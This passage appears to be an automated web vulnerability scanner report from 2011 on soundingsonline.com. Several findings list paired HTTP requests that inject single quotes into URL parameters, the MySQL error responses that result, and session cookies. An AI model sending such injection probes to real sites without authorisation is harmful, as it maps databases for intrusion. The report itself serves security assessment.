Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.165. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /contact-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /contact-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.166. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.167. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/in-depth?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/in-depth?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.168. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/justyesterday?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/justyesterday?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.169. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/lifestyle?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/lifestyle?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.170. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/profiles?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/profiles?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.171. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/technical?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/technical?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.172. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/type-of-boat?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

Request 2

GET /features/type-of-boat?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.173. http://www.soundingsonline.com/index.php [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.174. http://www.soundingsonline.com/index.php [chronoformname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1
